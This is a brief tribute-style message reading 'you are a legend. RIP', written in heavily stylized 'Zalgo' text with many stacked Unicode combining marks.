̧̧̡̡̧̧̧̡̨̢̧̡̧̧̨̧̨̢͔̭̳̪͓̭͖̤̯͙̣͍̦̜͍͙͔̩̲͎̞̙̝͉̮̮̠̖͉͓͈̻̞̙̳͓̫̠̭̼͇̣̠͈̤̲͈͈͉̻͉̘͚͖̮͎͔̮̻̼̼͖͔̪͈̭͎̰͉͈̫̥̗̦̗̝̣̫͍͉͍̦̭̫͙͙̰͎̞͈͈̜̩̝̮̞̮͓̗̞̤̪̯̙̣͕̥̝̬̗͎̠̝̼͉̣͍̰̳̥̙͎͓̖̪̹̙̝̭̩̮̤̣͈͉̝͈̹͖̙͎͍̦̠̭̤͓͈͓̟͙̝̣̘̦̱̦̪̠͌̾̅͒̿̃͛̀̈́̑́̓͊̽͊͜͜͜͝ͅͅͅͅͅ ̶̡̧̡̢̨̨̡̨̡̧̨̨̡̨̧̨̛̛̛̛͙̫̟̠̦̮̣̹̣̯̜̣̹͉͎̯̲͉̙͈̜̬̙̬̲̼̼͇̫̫̲̗̰̲̠̪̤̞͎̬̻̗̺̥̪̣̣̝̘͔͇̰͕̣̳̲̩̙̙͕͍̟̤̥̠̯̝͖̺̠̠͕̫̜͚̠̼͎͖̹̜͎͙̯̘̟̠͓̬̣̖̤̝̣̲̹̤̙̳̫̹̭̮̦̝̙͓̪̮̥̜̩͔̦̯͇͈͈͓̮̯̹͓̩͓̳̤̗̥̺̠͖̥̩̯̱̱̭̱̫̪̝̺͖̩̱͖̭̥͚͍̝͙̩̣̹̹͈͕͕̜͔̻̭͍̭̹͇̫̟̼̤̬͂̀͐̋͑̍̓́̾̈̀͊̿̈́̂͑̿̐̀̈́̃͒͗̾͑́̾̓̓̉̓́͗̈́͗͌̈́͆͑̎̅̇̾͂̓̈̇̓̓̂̔͗͌̍̈́̆̇̈̈́͐̍́̂̉͑̎̒̉̔͋̀̾̋͋̓̄̆͆̍̍͒͛͂̂̿̒͊̎̿̒͒̏̓̽̾̑̃̏͐̅̈́̑̍̀͊͑̈͂͋̂̌̌́̀̄̽͛̒͑̐̉̓̌͂̏̇́̾̉́̄͛̋̓̍̐̓̔̀̾͐͗̓̀͆̄̍̃͛̾͐͋͋́̅̽̊̃͆͊̀̇̈́̂̾̄̑͆̏̊̈́̒̂̐̂͑͛̋̆̔̇̑̚̚̚̕͘͘̚͘̚̕͘͜͜͜͜͝͠͝͠͝͝͝͝͠͝͠͠͝͝ͅͅͅͅͅͅͅy̸̡̨̢̡̧̢̧̨̡̢̡̨̡̧̧̢̛͖͉͖͉̗̰̗̺̘̟̩̜̙͎̲͙̝̣͓͔̮͎͎̭̺̲̱͕̯̭̘͔͚͉̫̘̼̺̲̳̩͙̰̥̪̩̪̭̦̣̠̭̟͖̣̙̞̲̦͙͈̻͎̞͎̳̲͎̼͓͙̺͉̦̬̗̤͇̞̱̼̝͕̲͙͕̫̗̳̰̫̠̞̲̞̳̲̞̠̫͍͈͍̘̪͍̻̜͍͍͈̗̤͉͔̼̯̻̬̳̙̙͓̖̪̣̻̯̥̻͔͚̥͇͇̭̳͔̪͔̥̼͈̘̭̱̳̤̟͍͖̯̪̯͕͓̗͈̩͈̬̖̙̘̰̥̱̼̝̼̻̥͓̤̞̯̬̭̤̗̦̲̲͙̣͚̰̯͖͈̮̦̗͔͚̞̦͕̜̭͈̙͕̭͔͇͕̥͖͕̙͕̳͍̞͙̲̹̞͖̻̦̗̹̬̮̪͕̞͈͇̻̬͉͔̻͇͕̥̟͍͉̪͈̻͇̖͇̯̗̤̳̲̲̪̰͉̳̙̮͔̋̂̌̂͑̅̏̐̇̿͒̅̆̏̋̅̒̾͌͒̑͗̾̀̒͒̅̍̊́̓̽̉̀̐̀̿͋̏̓̆̃̎̃͛̀͆̏͐̀̔̃̅͘̚̕͜͜͜͜͜͜͜͠ͅͅͅͅͅơ̶̢̢̢̡̡̢̡̨̨̛̛̛̛̛̛̪̰̮͙͍̻͍̩̟͈̪̯̳̞̰̬̘͎͔͖͇̘͍͔̖͔͍̭͕̤͎̭͇̼̪͍̻̰̻̺̭̦̙̞̹̺̫̲͕̤̭̤͓̟̳͔̹̗̳͎̗̟͉̗̥͍̥͇̲̹͙͇̹̠̫̌̒͛͛̔̈́̀́͛̿̈́̾̉͑͌̋͑̎̀̔̏̃̽̽̆̏͑͂̎̈́̍͒͊̋̍̆̆̑̈́̎͐́́̋̂̋̓̽̇̑͒̑̅͊͛̀̔̓̃͂̆̊̀̆̑͛̿̒̂̃́͆̈́͂̈́͛̈́͋̄̿͆̽̏͋̍͗̏̀̿̅̓̈̂̊͛̽͛͒̄̀̐̌̔͋́̍̐̆͛̉͐̀͂͐͌̉̈́͋͊̌̈́̒̄̔̍͂͊͆͆̋͑̓̉̈̋͊͐͐̓̔̔͒̒͗̀̂͋̄̓̈̐̃̐͐̊̈́͛̊̿̐̅̒̐̉́̋̈́̇͑̂̒̈́̍̉́̂͒͊̓̃̉̍̄̈́̇̌̀̍̉́̈́̓̅͗̋̄̅̆̋̌̿̎͊͋͆̀͋͂̑͑͆̚͘͘͘̚̚͘̕͘̕͜͜͜͜͜͠͝͠͝͝͝͠͝͠͠͝ͅͅͅư̶̢̡̢̢̨̨̡̧̡̨̡̨̢̢̡̡̧̡̡̡̡̢̛̛͍͔͈̜̮̫̟͙͖̜͎͕̳̮̹͍̞͕̪̝̗͈̺̮̝͕͍̩͍̫̙̠̺̖͓͓̫̹̟̞̦̞̠͙̱̥̙͙̣̯̳̞̪̠̭̟͍̫̦̪͖͎̰̰̯̯̩̣͎̼͎̙̫̻̥̣̱͈̼͍̻̯͎͖͕͕̬̼̜̰̠̜͔̙̳̜̜̦̫̲͉̞̻̰͚͓̫̠̹̩̦͎͕͙̞̬̜̘̻̖̫͔̮̯͔̻͓̟͚͔̳͕̖͔̹̻͙͔͙̦͈̩̬̜̦̱͖̝͙͔͉͓͖̰̙͉̫͕̟̯̥̥͙̘̙͙͖̩̺͔͇͖̱̬̪̝̱̙̙̼̗̝̤̻̝̺͙͈͔͎͍̻͓̜̘̻̯̪̬̜̹͖͉͈̳̫̬̻̲̘̣͉̱͙̞̩̠̄̀̈́̌̓̍̇͌͛̆͒̌̍̀̅̓̃̑̆͛̀̂̈́̐͊̊̂̃͆͛̌̏̃̃̇̿̔̓̽̈́̃́̈́͘͜͜͜͜͝͝͝ͅͅͅ ̷̧̧̨̛̛̛̛̛̛͚̳̹̻͓̙͔̰̞͖̟͎̺̟̟̤͉̼̜̗̮̮̠͚̣͇̫̤̩̦̖̙͕͙̳̲̩͍͐̾̍͛̋͗̀͋̿̓͗͋͛̐̅̊̃̄͊͐̂̔̑̐͐́͌́̒̏̇̈͑͌̉̿̏̏̾̌̀̈́̂̂͑͐́̒̆̏̍̓͒͒͌̋̏̒̓̑̀͋͌̎̐̆͗̓̆́̀̆̿̕̚͘͘͘͘̚̚̕̚͘͜͝͝͠͠ͅͅa̴̡̢̢̧̢̢̧̢̨̧̨̧̧̢̧̢̛̛̛̛̛̛̛̛̳͈̬̘͔͎̟̤͕͚̜͕͓̣̜̰̩̯̝̮̜̼͖̘̜͔͙͇̟͙͔̠͈͎̭̗̤̱͍̤̥̗̠̠̪̭̖̫͚̱͚̠̣̫͍̺̦̠̪̤̣͚̳̬̙̱͉̣̥̥̫̟͖͎̲͕̹͓̙͎̭̰̙̞͈̪̠̦͔̖̻͓̠̞̫̪͉͚͙͔̰̩̫̣̰͕͖̱̦̘͈̮̠͚̮͇̳̰̫̗͍̭̦̳̘͙̲̬̮͓̥͔͔͇̩̘͓̬̤̗̪͉̘͖̾̄̈͌̉̏̇̎̄̉̇̂̿̂͐̒̓̇̽́̔͐̍̃̓̓̈́̃͑̏̈́̔̾́̑̅́̈́̽̎͊̽͂͒̈́̈́͋̑̽̎̽́̎͊̈́̄͗͗̌̇̑̒͊͒̓̓͑͊͛̉̂̉̓̍̔̌͐͛̾̈́͗͐́̑́̀̀̅́͌̄͋̇̑̋̎̀̓́̏̐̓̀̌͗̓͒͗̊̏̋̀́͌̈́̽̅̐̈́̔͌̏̽͋͌̑͐̍̇̈́̌̆̋͗͑̑́̃̾͌̅́̈́͂̍̂̈̎̐͂̉̏͆̏̍̄͐̽̒̄͛͑̀̀͛͌̑̆̈́̈́̆̀̉̑͋͊͐̾̑͊͋͋͑̍̔̋́̉̔̂͊̃̚̕͘̚͘͘̕̚͘̕̚̕͜͜͜͜͜͝͠͠͝͠͠͝͠͠͝͠͝͝͝͝ͅͅr̸̡̧̢̡̡̢̡̨̛̛̛̛̛̛̛̻̜̦̱̬̙͇̙̥̞͓̥̩̤͙͎̝̤̙̜̖̼̺̲̪̻͖̘̮̙̠͚̫̩͔̤͇̼̙̪̟̼̝̠͕͔͇̻̭̤͈̹̮̬̭̻̻̥̻͈͎͚̳̳̮̗͓̫̥̘͕͉̩͉̞̳͇͕͉̤̲̅̒̿̂̾͆̓́̒̽̓̈́̅̐͗̈́͑̔͛̋̀̈́́͋͗̅͂͒͌͊̀͂͑̌̔͐̔̈̐͊̋̓͛̒̑̌̌̀̀̂͒́̀̀̀́̎̆͐̐͑̑͆͒̏̅̐́̅̅̈́̃̋͛́́̃͛͋̓̃͊́̈̀͆́̏̏͑̈͆́͑̒̈̊͊̐̔̌̐̏̒̀͋̂̄͒͐́̂̅̌̿̀̀̏̄̈́̽̈́̊̒̀̐̍̎͆͗̓́̈̓͆͌̓̽̇̊̃̓̽̉͑̆́̊̀̏̈́̆̈́͛̏̅͑͗̅́̎͊̋̆̄͑̇̓̒̀͛̓̊͛̅̌́̓̆͒̎̃̆́́̾͌̉̾̾̇͑̑̄͒͒̊̐͗̾͊̊̅̉̽̇̉̎̀̌̅̌̽͐̓̓̇͊̑̄͐̀̿͆̽͌͑̓̄̈́̑̎̑̕͘̕̚̕̕̚̕̚̕͘̕̕͘̕͘͘̕̚̕̚̕̕͘̚͜͝͝͝͝͝͠͠͝͠͝͠͠͠͝͝͝͝͝͠͝͠͝͝͝͝͠ͅͅͅͅe̵̢̢̡̡̡̢̡̢̡̛̛̻̣͙̻͇͉̝̦̲͔̯̣̞͉͉̤̮̬̜̬̦͓͈̭͓̬̼̺̥͍̻̖͎̯̮͓͚̥͖̣͙̺̮̬̞̹̱͎͇̦͚̹͎̹̬͖̗̞͙̟̪͈͙͈͕̱͓̯̤̩̣̦̓́̋̃̇̌̀̾̑̔̐͂̈́̉̇̀͋̿̌̍̇̀̊͌̊̂̎̆̏̀̊̀̐̃̐̒̓̅̎͌̇̒͊̈́̓̄̈́̀̈̾̓̐̏̃́̌̿̔̚̕̕̕̚͜͜͜͠͝͠͝ ̵̧̡̡̢̨̧̧̢̡̢̧̧̢̢̨̢̧̢̡̢̡̢̨̨̨̢̨̧̧̨̨̧̡̡̛̛̛̛̛̛̛̛̫͔̪̳̖͍͉͉̦̦͎̹͉̻̗̗͈̻̟̲̱̥̤̞̗͉̮̭͔̬͈̘̗̮̝̳̺̼̱̘̠̩̩̞͇͕͕̱̱̲̥̹̠̼̲̰̬̟̼͕̝͉͚̺̜͕̻͇̬̩̟̖͚̞͈̰̯̹̩̞̜̳̠̟̠̬͓̦̻͙̭͇̟̣̗̩͔̲̳̞̦̲̪͈̦̬͍̟̤̪͚͙̭̜̺͕̫̠̦̜̲͉̤͇̬̯͓̥̮̠̪̳͍̤̜͖͕̦̭̬͙̯̘̗̫̣͓̝͙̬̭̙̮̮͇̭̘͎̙̩͇͙̥̝̯̺̳͕͚̤͖̺̱̲̗̹̹̳̺̦̲͖̜̦̙͖̩̦̮̠̖̳̞͙͙͈̼͉̱̯̭̯̰̬͕̣̻̰̎̽̿̾̈̆̓̉̈́̈͒͑͛̆̐̈́̿͂̒̿͌̂̋̂̑̓́̔̎̏̌̆̎̊̀̈́̀̋̋̈̈́͂̄̽̓́̓̋͆̓̀̈́͆̌̀̂́̈́̃̆̊̂̾̄͛̎́̈́̂̏͊̐͋͋̇́̏̾̓̈́̋͑͐̅̊̃̎͋̿́̆͋̂͛͌̅͑̃̊̑̋͐̈́͐̈́̓̑͛͑̑̈́͊͑͛̀̀̔̈̂̏͛̅͋̐̏̓͊̆̈̊͐͛̆̑̾̇͒̂̇̆͒̎̎́͂͊́̆́̍̄̉̅̏͐̋̈́̽̄͌̂̅̀̆͌̓̇̇̌̆͌͗͂͊̓̽̈͛͊̓̀̋͛̽̐̓͋͛̒̑̌͋͒͂͌̉́̈̏́́̀͐̇̔͂̆̇͗̈̐͒͑̿̄̇̓͋͋̒̍̏͌͒̔̒̐͊͗̌͆͋̃̍͛̀͌͛͂̄́̀̕̚̕̚̕͘̕̕͘̚̚̚͘̚̕͘̚͜͜͜͜͝͝͠͝͝͝͠͠͝͝͝͠͠͠͝͝͝͝͠͠ͅͅͅͅa̶̧̧̢̢̨̢̡̨̢̧̢̡̡̨̨̧̡̢̡̡̨̛̛̛̛͍̬̩̟̞̗͓̙̥̘̹̫͓̻̱̖̘̠̪̞̥̺̘̲̞̙͔̭̤̞̦̗̦̖̱̪͎͚̬̗͔̹̗̳͇̬̜̰̰̗̦̞̤͔̬̦̣̭̼̤̳̤̥͎̪̦̹̘͙̣͚̮̖̤̗̟͚͖̬̣̫͇͖̳̰̦̟̳͇̬̥͉̩̠̮̟̠͇͎̳̘̝͕̣͎͔̗̥̰̤̯̜̻͈̗̗̺͔͉̙͎̳̤͉̘̫̭̗͙͇̹̼̣͎͚̱̮̖̩͍̜͔͉̩̻̘̲̹̠͎̺̿̎̋͒̉͛̀͆̊̀̆̍̔̅͗̇̈̽̈́̇͌̌̽̂̽̋̇͂̓̊͋̇̽͐̈́́͐̾̌̑͒̋̌̍̀̂͌́̈̄̓͆͒̈́̋̈́̎͐̅͒͒̈́̈́̀̔̋̌̓̓̀̈́̾̌́̔͋͋̀̉͋̔̓̄̊̑̌̃͛̒̍͌̍̄͂̆̌̐̾̉̾̓͑͊̂͂̊̋͌̋̓̾̾̈́̅͌̂͌̊́̅̆̂̐̎̑̃́͗̿̾̓̆͆͘͘͘̚͘̚͘̕̕͜͜͜͜͜͜͜͜͠͝͝͝͠͝͝͠͝͝͠͠ͅͅͅͅͅͅͅ ̶̨̧̡̨̧̢̢̢̢̛̛̛̛̛̖͕͔̥̯̠͎͍͖̫̭̳̰̝̬̺̬̼̦͔̼͈͖̝͖͕͕͍̝̭̯͈͙͙͍͉͇͚̜̠̳͔͈̜̹͓̣͖̞̖̟̫͚̭͍͓͖̺̦̘̝͇̹̭͉͎̙̹̘̣̭̗͈͈͓̼͖̭͎̹͚̞̲̣̼͔͎̖̣̙̪̬͓͍̝͖̻̪͙̞̰̪̝̙͖͖͇̩̹̰͚̮̣̻̻̠̤̰̞̫̬̘͙͕͓̠͎͕̜̲̦͎̰̺̯͓̤̥͍͉͓͇̂̏́͊̽̌̎̅̀̍́̀̍̊̈́̒͋̄̔́̓͆̾̉͛̆̆̌̍̈́̀̈́͋̀̾̐̎̎͒͒̂̔̏̀͗̄̂̈́̉̍̊̀̆͑͒͛̏̃̐̓̈́̊̇̈͒́̽͂̃̈́̿̐̆͐̊̅͐̑͒͊̀̀͛̆͗̃͐̈́̿͛̆̃͑̍̐̑͋̋̏͂̒̏͛̄̓̎͋̃͗̉̅͑̽̀̾̄̐́͊̀͐̊̓̑̓́̾̈́̓͗͂̋̿̍͆̉͒̄̎̂̿̃͂̒͆̌̑̒̓̏̒͋̑̉͌̏̐̽́̄̂̀̊͗͛̉͊̎̆̐̉̎̀̒̄̋̂̓͂̊͌̈͋̽̈̈́́̃̓̾̎̉͊͋͌̅̄͐̂̋̅̚͘̚̕̕̚̕̕̕̚̚̚̕̕͘̚͜͜͜͜͝͝͠͝͝͠͝͝͝͝͠͠͠͝ͅͅͅͅl̵̨̨̢̨̨̢̧̨̨̢̨̧̡̡̡̨̧̡̡̢̛̛̮̭̩͕̼̩͇̟̘̼̲̠͖̟̱̫̥͔̬̩͇̥̩̫̞̲͚͈͈̪̳̩̼͚̹̯͙͍͇̰̲̗̳͖̹̻̯͉̼̺͔͓̟̞͍̭̞̜̱̼̦͉͕̲̻̰͍͎͔̮͈͎̜͔̭̯̠̹̟̜̥̣̮͖̙͔̱̰̗͈̦͉̙̰͔͈͔̠͈͖̺͖̞̯̜̯̯̩̠̹̰̥͍̤̙̲̩̼̩̺̲̞̤̖̘͈̰̣̦̯͈̺̯̦͉̲̥̳̘͓̝̈́̂̈́̈͐̃̆̈́́̌̀́͒̉̋̈́̎͒̍͗͒̽̃̾̈̊̇̂̿̃̓̀̍͛̀̔́̎̾̀̑̆̀̀̉́̆̂̉̆́̌͆̀̆̑̽̈́͗̿͋͂̈́̓̋͌̀͐̀̐̔͆͆̈́̈́̆̃͛͐͂̓̐̈́͒̅̽̅͋͐͘͘̚̚͘͘̚̚͜͜͜͜͜͜͜͝͠͝͝͝͝͝͝͝͝͠ͅͅͅͅͅe̷̛̛̛̱͕̮͊͆̍͋̾̽͆͛́̅̋̅̈̒̑̈́̓͌͗̈̿͆̌̌̀͆̿̂̆̈́́͊͊̒̔͊̂̿̃̆̽͆́̄̅̓̄̌̀̎̍͗͒͋͒͆̿͛̀͋̾̌̃̊͐̋̍̇́̌̈́̾̉̈́́̆̃͗̿̈́͑̏̔̈́͒́͐̃̾̏́͆̇̏̅̏̓̀͛̓͊͗̑̊̓̋̃̒͊́̈́͋̌͆̎̈́̿̏̌̈́̓̀̈̂̍̿̀̅͂̎̇͐̈́̄̈́͆̃͆́̓́̏̐͌̄̓̌̈̓̀̊̋̅̎̒̓̂̊̏͛̃͋̒̆̓͒͒͋͆̒́̀̐̅̃̃̃͂́̇̎̆̈͑̆͒́̊̾̐͒̽̂͗̍̏͊͛͊̌͋̀̅̈́̂̓͐̔͌͘̚̕͘̕̚̚͘̚̚̚̚̕̕̕̕̚̚͝͝͠͝͠͠͠͝͝͝͠͠͠͝͠͝͠͝͝͝͝g̵̢̡̡̡̡̧̨̧̡̧̢̢̨̡̨̢̢̧̨̡̡̡̨̧̢̢̨̢̧̛̪͕̳̮̝͔̲̝̲̼̪̥͓̠̪͔̞͓͙̝̟̜̖̦̖̣̣̬̤̠̤̼̱̤̮̰͚̩̼͚̰̗͍̹̼͎͇͖͕̟̻̗͉͖̣͎͓͖͖̞͈̟̹̻̳̖̱̜̱̥̺̪̼̳̣̥̜̯̭̺͇̬̮̞̳̫̳̤̦̳͕͎̦̠̣̺͕̹̞͍̼͎͇͙̮̼̬̖̳͎̼̹̩̮̦̤̠̗̰̦̮͕̪̬̟͔͇͇͉͉̖͍̯̟̼̳͓̠̗͇̝̻̺̘̦̠̪͕͎͈̬͕̲̩͇͎̞̣̲̗͙͔̭̖̻̬̠͕̼̮̼̻͇̥̹͉͈̱̰̖͖̝̱̥̘̖̦͓̟̬͈͖̘̯̱̘͙̩̖̳̱̘̭͓̼̼̩̖͔̗̰͔͕̯̺̻̰͔̫̞̳̖̼̭̬͔̝̝̮̪͙̪͊̏͊̇͗́̒̈́͂͑̈́̎̌͂͑̓͒̓̂̔̉́̉̋̅͋̓͗͗̔̑͆̽͛͒̀͐̀̒͋̅̏͗̄̉̈̽̇̍̎́̇͊̊̊̈́́̇̒͑̋͋̉̑̽̔͐̒̌̐͑̔̐̓́̈̇͒̎͒͐͆̎͆̔́̎̾͂̋͛́̃́̂͑́͒͋̽͋́͑͋̈̏̆̕̚̚̕͜͜͜͜͜͜͝͠͝͝͝͠͠͝͝͠͝͝͝ͅͅͅͅͅͅͅe̴̢̢̢̡̡̧̨̡̢̡̢̨̢̧̨̧̡̨̧̨̨̛̛̛̛̛̛̩̤̰͚͚̗̼̯̼̘̟͎͍͉̬̱̰͓͕̦͚̪̳̹͎̮̬̥͍͔̫͓͎̗̯̭̺̗̟̜͙̹̠̘̰̪̪̜͔͍̜̺̠͚͎̱̥̞̥̟̠͇̩̰̜̯̞͈͍͈̖͇͎̺͚̗̘̣̠̦̝͎͙̜̗̹̻̫̻͔̘̥̬͚͍̲̳͇̝̼̹͖̻͚̥͇̖̬̟͇̳̺̠̟͉̦̣̰͎͓̤̺̜̯̟̻̭͔͔̘̮̥̝̭̪̻͙̬̮͖̤̗̠̺̤͍͇͍̺̠̬͔̟͖̻̯̲̤̱̬̖̼̠̬̭̗̲̥̗͉̦͚͖͈͓̙̯̖̝̭̭̩͒͋͊̉͆͌̇̊̓̉̽̿͗̔̂̈̊̎̔̏́͊̾́̆͒̿̆̋̋̏͐̐̓̀͒́́̉͌̏͗̎̓̉́͐̌̾͊́͛̊̔͛̀̇̍̈̔͛̈́̏̔͊̄̈́̏̑̌̍̋͂̉̐͋́̽̓̾̏̍͒͑̍̇͛̿͛̒̏͊̒͆̐̿̋̈́̇͆̉̒̔͊̋͛̓̀̀͑̀̐̓̂̾̀͒̿̅̊͒͑̋͊̅̿́̈́̑͋͋͛̌̔̅̈̓̇̈̾̂̓̈́̔͑̆͐̌́̊͂́̈̈́̈́̉̆́̾̾̈͒͑̃̒́̿̾͂̓͛͛̏͗̄͗̓̓̀̇̉̀͘͘̚̚̚̕͘̚̕͘̚͘̕͜͜͜͜͜͜͜͜͠͠͝͠͠͝͝͠͠͝͝͝͝͠͝͠ͅͅͅn̶̢̢̢̨̡̢̨̢̢̨̡̨̢̡̧̢̡̢̨̧̨̡̢̧̛̛̛̹͖̠̻̹̻͚̦͇͇̤̲̫̼̮͎͔̟̘͎̰͖̻̲̻̥̤͉̹̼̠̣̝͍̼̺͉̰̰̰͓̣̫̰̟͔̲̞̪̺͈̥̹͙̫̦̼͎̭̳̠̯͚̯͕̺͔̞̼̪̝̭̤̠̭̼̤̫̝̩̜̱͕͕̞̗̭̬͉͙̞̯͖͇̮̯͍̩̠̰̗̭̙̙̻̲͕͍̹̙̻̩̳̫͚͓̣̞̣̞̳͚̜͇̯͚̖͍̙̭̠̼̦̤͙̳̮̮̠̼̤̣̗̲̤͇̮̥̫̤̯̝͙̹̞̭̘͍̯̤̫͎̲͎̼̪̞͎͉̠̰̫̻̼̯̦̥̫̖̮͉̹͈̥̩̰̳͓̲̲̯̝̼̝͕͎̝̠̻̫͈̬̗̣̞̜͇͎̹̻̦̪̖͎̱̗̜̣̲͙͚̙̣̮͓̖̞̪͓͙͉͕͇͚̱̤͎̣͉͙̦͚͍̜̤̖͓̔̏̒̓̆̒͗̊͂̈́̌̑́̓̇͒̎͛̊̄̐̍̑́͑̾̂͒͒̏̓͗̅̐̔̂̅̈̃͐̅͐̃̒̉̂͌͆̀̋͊́͛̊́̆͐́́͐͒͛̈́̇́̍̔̏̑͗̿̅͋͊͂̐̋̋̽͑̆̃́̾͛̍̆͑̐̋̔̂̃̀̊͂̓̒̑̈̆̂̆̽̎́̆̇̏̂̂́͑́̆͊̌̂͗̓̂̓͛͛̓̆̉̅̽̉̄̈́̈́̾̿̍̀͒͌͌̒̊͛́͗̂͒̒̈́̃̐̋̀̐͐̏́́̈́̃́́̄̾̾̔͐̓̔͘̚̚͘̚̕̕͘̕͘̚͘͘̕͘͘͘͘͜͜͜͜͜͜͜͜͜͜͝͝͝͠͝͠͝͠͝͝͝͝͠͝͝͝ͅͅͅͅͅͅͅͅͅͅd̴̛͕̓̏̐̅̒̉̇̈̾̂̾̄̀͐̃̾̐̔̒̾͑̈́͐͌̌̋́̉́̋̀̑͆̇̔́̆̇͒͆̈́͛̏͑̌͌͌̀̾̆̈̐͌̈͒̇̍̋̎̆͒̈́̎̈́͛̀̈́͑̿̔̌͌̋̈́̀̈͋͑͘̕̕̕͘͘͘͝͝͝͝͠͝͠͝͝͠.̷̡̨̧̢̢̧̡̡̡̧̡̨̢̨̛̛̪͓̰̮͖̮͚̮̥̱̪͚̫̰̼̣̞̰͎̰̟̠̱̲̦̰̲͙̯͚͈̮͍̭̜͉̳̟͎͙̳̼̦̗̱͚͉͚̰͓̟͎̦̘̤̯̖̪̖̦̳̗̮͉̟̮̲̲͚͙͇̹̦̥͍̥̤̝̼̮̦̖͍̠̳̲̱͈͐͑̽̀̄̎́́́̍͗̌́̄̉͛̿̎̀̊̓̊̇̃̄͛͌̉͑̈́̈́́̊̽̎̓̀̈̈́̀̏͐̅͑̽̏͗̈̀͗̓͐͌̅̀͐͗̒̀̉̔̈́̈̽͒̑̏̍̔̒̄̆̽̀̂̀̾̎͑͌͛̒̎̏̕͘͘͘̕͘͜͜͜͝͝͝͝͝͠͝͠͝͝͝ͅͅ ̸̧̧̢̡̢̢̨̨̨̢̡̢̢̧̡̢̡̢̧̛̛̛̛̛̱̙̣̬̭̦̤̼͍̮̮͔̗̖̦̲̖͍͎̠̝͖͔̹͙̤̝͇̺͔̟͎̱̱̺̟͕͍̪̥͚̼̦͇̖̝̲͓̮͙̖̲͓̟̯͕̥̰̮̣͖̦̱̭̥̱̠̬̱̺͕̼͓̻̝̥̘̘̦̫̬̺̦̳̞̫͕̯͙͔̪̗̜̪̟͔̹͚̤̩̟̹̬̙̜͚̞̩͈̬̟̲̜̖̟̹̤̺̹͙̖̣͉͍͖͉̜̺͚͙̯̺̬͇̻̳̣͓̦̦̺͈̳͙̲͎̟̪̪̱͙̱̩̖̪̮͕̗̣͙̮̲͎̲͍̤̻̤̯̞͇̙͇̠̦̻͕͇̰̱̺̺̥͖̝̺̩̟̘̜̤̬͔͉̟̙̼͙̩̪̠̻̱̱̲̱͇̯̗̼̗̩͖̠̳̜̹̗͔͓͚̩̤̹͉̪̙̬̙̥̭͓͖̙̰͚̙̺̣͍̗̫͚̺͖̣͊̓̑̽̽̍͐̏͋̃̓̈̎̈́́̈͌͋̔̉͒͑̾̉͐̃̊̑̇̐̀̏̿͛́̐͌̐̒͌̑̓̍̓̏͌̉̓̽̀̋̔͒̈́̈́̏̉̀͒̃͛͆̈́̈́̔̎̀̅̏͒̔̾͗̐͗̈̎̀̎̇̅̊̇̋͑̂̆̀̑̿̉̾̇̒̎́̾̀̊͗̿̾̇̏̒̈́̇̐͛͆͌̌̾͂͗̌̐̅̌̑̆͑̐́̒̍͊́̇̽̃̈́͐̒̀̈̈́̈̆̈́̎̑̇̏̎͑̅̍̐̑́͂͋͒̍̍͌̂̽̐̇͊̌̋̉̿͒̔̌̆̾͑͛̐̽͒͛̒̚̚̕̕̚̚͘͘̚͘̕͘͜͜͜͜͠͝͝͝͝͝͝͝͝͠͝͠ͅͅR̶̡̧̧̢̢̧̢̨̧̡̡̧̧̢̧̢̡̧̛̛̛̛̛͍̼̤͖̮̮̪̗͉̗͈̜̻͈͙͍̻̳̻̲͓͕̺̲̩͚͍̝̮͉͎̩̭͍̪̜͉̙͉̩̻̘͎̠̱̗̳̮̗̱͇͇̰͔̪͈͓̜͈̟̠͈͖̩͚͕̦̱̫̥͉̦͇̤̘̦͎̫͔̼͇̘̻͙̲̗͙͙̲̤͍̗͇̟̮̺͕̭̰̰̟̜̯̬̼͇͖̘̼̬͍͚͇͉͈̰̣̖̭̮̝̠̪͓̯̱̘̟͖̹͇̲̳̬͙̗͙͚͈͖̺̗̜̫̦̗̮̘̼͈̘̬̥͖̣̝̖̬̺̪͎̻̝̬͚͉͚̱̼͉̘̹̥̯͎̝͇̠͖̟̝̫̼͇̞͙͍̤̣̘͓̞̳͔͉̲̘̱̭̰̫͖̙̠̠̼͍̼̣̺̣̯̫̩͎̻͍̻̤̯͈̭̍̆̏̈́̄́̋̈͆͒͒́͗̾̋̌͆͛̌͗̿̀͊̐͊̎̆̓̾̀̀͆̌͒̽̅̐̈́̎͊̄̔̐̐̾͌͌̐͑̓̇̑̔̈́̂̒͐̾͂̾̇́͑̈̂̊̎͆̒̀̑̇͐̿̀̇̑́̉́̍́̎̀̇͗͐́̾̀͆́̓̀̓̊̇́́̆̎̉̄́̍̅̋̉̉̆̒̏́̀̿́͒͆̑́͑̀̀̐́̔̀̉̈́͊̊̉̑́̃̓̉̅̽̀͊̈́̉̍̈́̒͂̿̃̊̍̑̏̊͊̔͆͊̒͆̈́̆̈̆͌̽̓̋͐̑̀͑̄̿̽̐̌̍͆̓͗̄̌͘̚̕̕̚͘͘̕̕̚͘̕̕͘̚͘͜͜͜͜͜͜͜͝͝͝͝͝͝͠͠͝͝͝͠͝͠ͅͅͅͅĮ̴̧̡̡̨̡̧̧̢̨̧̧̛̦͙̹͙̫̬̼̘͙͙̟̙̳̖͍̘̳͓̼̘̯̹̟̙̠̪̦̠̱͙̜̳͖̘̝̟͎͍͈̘͎͕̩̙͎͙̝͍̪̝͉̟̻͈̗̰͙̥̩̟̤͙̳̞̤̭̳̜̳̫̱̰̫͔̝̭̠͎̦̻̜͎͈̠͇̝̝̹̻̗̳̗̮̟̫͍̲̘̮̞̝̍̀̋͌͐̐͆̏͂̾͂̀͛̋̂̍̆͗͛̃͒͑̐̍̃̉̈͑̌̊̏̉̓́̅͒͋́̃̀͆̑̿̄̽̈́̀͌͌͊̾͐̇́͛͋̅͐̈́̓̽̊̇͋̌̋̔̊̎̽͛͌̌̊̒̀͐̐̈́̄̐̾̂̎̿̈́̍͘͘͘̕͜͜͝͝͝͝͠͝͝͝͝͝͝͝P̶̢̢̧̧̧̨̧̛̙͓̝͚̥̭̲̝̙̩̱̺͉̦̤̰̙͕̗̘̻̲̹̘̤̝͖̘̩͕̗͍̝̱͇͍̳̳̓̽̋̾͆̎̈́̓́̐͆̑͆̑̔̈̈͒̅̈̂̒̄͗̅̽̂̒̑͛̇̀̈̅͛̇̐̀̂̾͛͗̇̆͗̀̀̌̓̀̀̂̍̍͛̀̅͂̓͆͋̔͊̅̿̏͒̿̍̅̀̅͂̀͐̍̑̅̌́̋̋͆̌͋́̏͋̈́̓̉̀͑̀̽̋͂̍̀͑͗̅̔̍̈̊͌̍͛̓̒̓̿̌̃́̇̽͐́̾̅́̂̓̉̒̌͑́̈͘͘̚̕̚̕͘̚̕̕͝͠͠͝͠͠͠͠͝͝ͅ